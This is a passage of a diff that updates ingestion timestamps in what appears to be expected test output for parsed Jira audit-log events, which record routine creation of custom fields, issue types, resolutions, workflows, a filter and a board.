created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Team\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Team\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539618,\"nano\":318000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1337,7 +1337,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782564014Z", + "ingested": "2021-12-15T09:00:47.652634683Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10101\",\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Parent Link\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Parent Link\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539618,\"nano\":974000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1407,7 +1407,7 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-08T14:50:53.782566446Z", + "ingested": "2021-12-15T09:00:47.652635685Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10101\",\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field updated\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539618,\"nano\":990000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1465,7 +1465,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782568913Z", + "ingested": "2021-12-15T09:00:47.652636645Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10102\",\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Target start\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"The targeted start date. This custom field is created and required by Portfolio for Jira.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Target start\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":224000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1540,7 +1540,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782571321Z", + "ingested": "2021-12-15T09:00:47.652637579Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10103\",\"name\":\"Target end\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Target end\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"The targeted end date. This custom field is created and required by Portfolio for Jira.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Target end\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":266000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1615,7 +1615,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782573783Z", + "ingested": "2021-12-15T09:00:47.652638572Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10104\",\"name\":\"Original story points\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Original story points\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Original story points\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":313000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1685,7 +1685,7 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-08T14:50:53.782576207Z", + "ingested": "2021-12-15T09:00:47.652639491Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10102\",\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field updated\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":332000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1743,7 +1743,7 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-08T14:50:53.782578709Z", + "ingested": "2021-12-15T09:00:47.652640563Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10103\",\"name\":\"Target end\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field updated\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":340000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1801,7 +1801,7 @@ }, "event": { "action": "jira.auditing.issue.type.created", - "ingested": "2021-12-08T14:50:53.782581143Z", + "ingested": "2021-12-15T09:00:47.652641512Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Epic\",\"type\":\"ISSUE_TYPE\"}],\"auditType\":{\"action\":\"Issue type created\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"issue types\",\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":485000000},\"version\":\"1.0\"}", "type": [ "creation" @@ -1864,7 +1864,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782583567Z", + "ingested": "2021-12-15T09:00:47.652642470Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10105\",\"name\":\"Epic Name\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Name\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Provide a short name to identify this epic.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Name of Epic\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":522000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1939,7 +1939,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782585978Z", + "ingested": "2021-12-15T09:00:47.652643458Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10106\",\"name\":\"Epic Status\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Status\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Epic Status field for Jira Software use only.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Status of Epic\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539621,\"nano\":644000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2014,7 +2014,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782588448Z", + "ingested": "2021-12-15T09:00:47.652644383Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10107\",\"name\":\"Epic Colour\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Colour\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Epic Colour field for Jira Software use only.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Colour of Epic\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539621,\"nano\":669000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2089,7 +2089,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782590836Z", + "ingested": "2021-12-15T09:00:47.652645314Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10108\",\"name\":\"Sprint\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Sprint\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Jira Software sprint field\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Jira Sprint Field\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539622,\"nano\":694000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2164,7 +2164,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782593212Z", + "ingested": "2021-12-15T09:00:47.652646248Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10109\",\"name\":\"Epic Link\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Link\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Choose an epic to assign this issue to.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Epic Link Relationship\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539622,\"nano\":725000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2239,7 +2239,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782595639Z", + "ingested": "2021-12-15T09:00:47.652647177Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10110\",\"name\":\"Rank\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Rank\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Global rank field for Jira Software use only.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Global Rank\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539622,\"nano\":794000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2314,7 +2314,7 @@ }, "event": { "action": "jira.auditing.issue.type.created", - "ingested": "2021-12-08T14:50:53.782598052Z", + "ingested": "2021-12-15T09:00:47.652648126Z", "original": "{\"affectedObjects\":[{\"id\":\"10001\",\"name\":\"Story\",\"type\":\"ISSUE_TYPE\"}],\"auditType\":{\"action\":\"Issue type created\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"issue types\",\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539629,\"nano\":37000000},\"version\":\"1.0\"}", "type": [ "creation" @@ -2377,7 +2377,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782600473Z", + "ingested": "2021-12-15T09:00:47.652649107Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10111\",\"name\":\"Story Points\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Story Points\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Measurement of complexity and/or size of a requirement.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Number Field\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539629,\"nano\":88000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2452,7 +2452,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:53.782602907Z", + "ingested": "2021-12-15T09:00:47.652650084Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Done\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"Work has been completed on this issue.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":534000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2517,7 +2517,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:53.782605406Z", + "ingested": "2021-12-15T09:00:47.652651150Z", "original": "{\"affectedObjects\":[{\"id\":\"10001\",\"name\":\"Won't Do\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"This issue won't be actioned.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":535000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2582,7 +2582,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:53.782607818Z", + "ingested": "2021-12-15T09:00:47.652652085Z", "original": "{\"affectedObjects\":[{\"id\":\"10002\",\"name\":\"Duplicate\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"The problem is a duplicate of an existing issue.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":536000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2647,7 +2647,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:53.782610275Z", + "ingested": "2021-12-15T09:00:47.652653003Z", "original": "{\"affectedObjects\":[{\"id\":\"10003\",\"name\":\"Cannot Reproduce\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"All attempts at reproducing this issue failed, or not enough information was available to reproduce the issue. Reading the code produces no clues as to why this behavior would occur. If more information appears later, please reopen the issue.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":537000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2712,7 +2712,7 @@ }, "event": { "action": "jira.auditing.workflow.created", - "ingested": "2021-12-08T14:50:53.782612699Z", + "ingested": "2021-12-15T09:00:47.652653935Z", "original": "{\"affectedObjects\":[{\"id\":\"Software Simplified Workflow for Project TEST\",\"name\":\"Software Simplified Workflow for Project TEST\",\"type\":\"WORKFLOW\"}],\"auditType\":{\"action\":\"Workflow created\",\"actionI18nKey\":\"jira.auditing.workflow.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"admin.workflowtransition.transition\",\"key\":\"Transition\",\"to\":\"Create (To Do), To Do (To Do), In Progress (In Progress), Done (Done)\"},{\"i18nKey\":\"common.words.status\",\"key\":\"Status\",\"to\":\"To Do, In Progress, Done\"},{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Software Simplified Workflow for Project TEST\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow is managed internally by Jira Software. Do not manually modify this workflow.\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":710000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2792,7 +2792,7 @@ }, "event": { "action": "jira.auditing.workflow.scheme.created", - "ingested": "2021-12-08T14:50:53.782630912Z", + "ingested": "2021-12-15T09:00:47.652654905Z", "original": "{\"affectedObjects\":[{\"id\":\"10100\",\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Workflow scheme created\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"TEST: Software Simplified Workflow Scheme\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow scheme is managed internally by Jira Software. Do not manually modify this workflow scheme.\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":732000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2862,7 +2862,7 @@ }, "event": { "action": "jira.auditing.workflow.scheme.added.to.project", - "ingested": "2021-12-08T14:50:53.782634945Z", + "ingested": "2021-12-15T09:00:47.652656639Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"10100\",\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Workflow scheme added to project\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.added.to.project\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":746000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2925,7 +2925,7 @@ }, "event": { "action": "jira.auditing.filter.created", - "ingested": "2021-12-08T14:50:53.782637357Z", + "ingested": "2021-12-15T09:00:47.652658100Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Filter for TEST board\",\"type\":\"FILTER\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Filter created\",\"actionI18nKey\":\"jira.auditing.filter.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"filters\",\"categoryI18nKey\":\"jira.auditing.category.filters\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Filter for TEST board\"},{\"from\":\"\",\"i18nKey\":\"common.concepts.description\",\"key\":\"Description\"},{\"from\":\"\",\"i18nKey\":\"common.concepts.owner\",\"key\":\"Owner\",\"to\":\"test.user\"},{\"from\":\"[]\",\"i18nKey\":\"common.concepts.shared.with\",\"key\":\"Shared with\",\"to\":\"[Project: test (VIEW)]\"},{\"from\":\"\",\"i18nKey\":\"jira.jql.query\",\"key\":\"JQL Query\",\"to\":\"{project = \\\"TEST\\\"} order by Rank ASC\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":887000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3020,7 +3020,7 @@ }, "event": { "action": "Board created", - "ingested": "2021-12-08T14:50:53.782639717Z", + "ingested": "2021-12-15T09:00:47.652659106Z", "original": "{\"affectedObjects\":[{\"id\":\"1\",\"name\":\"TEST board\",\"type\":\"BOARD\"},{\"id\":\"1\",\"name\":\"TEST board\",\"type\":\"BOARD\"}],\"auditType\":{\"action\":\"Board created\",\"actionI18nKey\":\"Board created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"boards\",\"categoryI18nKey\":\"jira.auditing.category.boards\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":72000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3083,7 +3083,7 @@ }, "event": { "action": 